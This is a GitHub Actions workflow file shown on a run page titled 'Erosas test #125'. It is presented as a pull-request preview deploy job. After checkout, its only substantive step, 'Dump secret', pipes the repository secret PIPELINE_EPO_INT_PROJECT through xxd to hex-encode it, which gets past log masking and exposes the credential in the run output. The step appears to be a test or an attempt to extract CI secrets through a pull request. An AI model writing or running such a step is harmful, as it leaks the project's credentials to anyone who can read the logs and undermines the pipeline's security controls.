Skip to content

Erosas test

Erosas test #125

Workflow file for this run

name: 'PR Preview to Int'
on:
pull_request:
types:
- 'opened'
- 'synchronize'
- 'reopened'
- 'closed'
branches:
- 'master'
jobs:
build-push-deploy:
name: 'Build and Deploy PR Preview to Integration'
runs-on: ubuntu-latest
if: ${{ (github.event.action != 'closed') }}
# Checkout the repository to the GitHub Actions runner
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Dump secret
run: echo -n "${{ secrets.PIPELINE_EPO_INT_PROJECT }}" | xxd -ps